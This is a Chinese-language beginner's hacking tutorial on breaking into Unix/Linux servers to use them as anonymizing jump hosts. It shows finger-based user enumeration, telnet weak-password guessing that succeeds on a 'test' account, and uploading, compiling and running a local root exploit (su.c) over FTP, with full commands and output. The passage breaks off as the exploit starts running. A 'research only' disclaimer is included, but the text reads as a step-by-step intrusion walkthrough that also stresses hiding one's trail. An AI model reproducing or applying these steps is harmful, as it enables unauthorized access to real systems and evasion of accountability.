unix入侵教程

unix入侵教程

我写这篇文章的目的是给那些想学黑客技术的菜鸟们看的,假如您已是高手了,您能够跳过去没必要看了J这里所讲叙的是从寻找跳板开始到如何擦PP的完整过程.这篇文章纯属研究性文章.请不要将此用于不正当途径.后果自负!!!最后,假如要转载本文请保持文章的完整性,以尊重作者的版权J

一．跳板篇

这些年网上黑客事件也日益增多了,各个国家和网络安全的法令也相继推出了!因而假如想入侵一个系统.而又不想惹上官司,那么自身安全因该是放在第一位.嗯,那么如何才能够确保自己不被发现呢？谈论这个问题的文章出来了很多，但在这众多的方法中我还是比较喜欢使用跳板主机(也就是平时说的堡垒主机)，使用跳板主机有几点好处，首先是能够隐藏自己，再就是假如有一台功能齐全的跳板主机能够让工作达到事半功倍的效果：）那么假如得到一台跳板主机呢？

在网络上运行的服务器有很多，最常见的有Unix Linux NT W2k Solaris irix FreeBSD但是在这些主机中我最喜欢用W2k和Linux作为攻击平台了。W2k的Crack方法有很多比如：输入法漏洞，Unicode二次编码漏洞，IPC共享密码猜测等等，这些漏洞的利用方法有很多，而如何将NT/W2k做成跳板的文章也不少，因而我在这里也没有必要再重复了，我建议大家能够看看小榕写的关于如何利用IPC的补充文档，上面有如何将NT/W2k做成跳板的周详过程！

下面我主要介绍如何制作Linux的跳板主机，要得到一台Linux能够用破译弱口令的方法得到，至于破译弱口令的工具我感觉流光是最好用的：）您能够到www.netxeyes.org免费得到。假如不想下工具的朋友，能够使用Finger命令来得到弱口令列表：

比如我们已知道xxx.xxx.xxx.xxx的79端口开放，那么我们能够轻易的得到一些薄弱主机的用户列表J

――――――――――――――――――test――――――――――――――――――

c:>finger 0@xxx.xxx.xxx.xxx



[xxx.xxx.xxx.xxx]

finger:0:no such user

------------------------------------------------------end------------------------------------------------------

失败：（呵呵。。。没关系啦，别灰心我们再来！！！

-------------------------------------------------------test-----------------------------------------------------

c:>finger 0@xxx.xxx.xxx.xxx



[xxx.xxx.xxx.xxx]

Login Name TTY Idle When Where

Root ??? <….>

Bin ??? <….>

Sys ??? <….>

ver21 ??? pst/0 211.25.64.2

liky ??? 437 211.35.26.4

how ??? pst/2 211.65.24.8

tong ??? pst/0 211.85.24.5

test ??? <….>

dv0928 ??? 52 211.54.25.6

nobody ??? 021 211.25.42.6

imnadm ??? 62 211.23.65.5

哈哈。。。这么多用户：）这下我发了：）

c:\>telnet xxx.xxx.xxx.xxx

Red Hat Linux release 6.0 Publisher's Edition (Hedwig)

Kernel 2.2.5-15 on an i586



Login:nobody

Password:

Login incorrect

Login:imnadm

Password:

Login incorrect

Login:test

Password:

##########################################################################

# However,as the Serv will reload those classes. #

# inside the “/usr/proj/gipex/class”.you just. #

# need to remove the old class with the new one. #

# #########################################################################

$w

6:19pm up 61 day(s), 3:40, 3 users, load average: 0.11, 0.07, 0.10



User tty login@ idle JCPU PCPU what



root console 4May0161days 2 2 /usr/dt/bin/sdt_shell -c ?



root pts/4 Fri 4pm 5days tail -f syslog



delex pts/7 6:19pm w

$uname –a

Linux server.syscrew.co.jp 2.2.5-15 #1 Mon Apr 19 21:39:28 EDT 1999 i586 unknown

$gcc

gcc: No input files

不错哈。。我能够编译程式了：）

下面我就要来个本地溢出得到ROOT只有ROOT才能够干我想干的事情啊！！！

Su.c能够在ｗｗｗ．ｈａｃｋ．ｃｏ．ｚａ找到！！！

好了，下载下来。。。。

c:\>ftp xxx.xxx.xxx.xxx

Connected to xxx.xxx.xxx.xxx

220 server.syscrew.co.jp FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:5

3 EDT 1999) ready.

User (xxx.xxx.xxx.xxx:(none)):test

331 Password required for test.

Password:

ftp>put su.c

200 PORT command successful.

150 Opening ASCII mode data connection for su.c.

226 Transfer complete.

ftp: 12554 bytes sent in 0.00Seconds 12554000.00Kbytes/sec.

ftp>bye

221-You have transferred 11991 bytes in 1 files.

221-Total traffic for this session was 12355 bytes in 1 transfers.

221-Thank you for using the FTP service on xxx.xxx.xxx.xxx.

221 Goodbye.

好了换telnet来

$gcc –o su su.c

$./su

su exploit by XP

Enjoy!



Phase 1. Checking paths and write permisions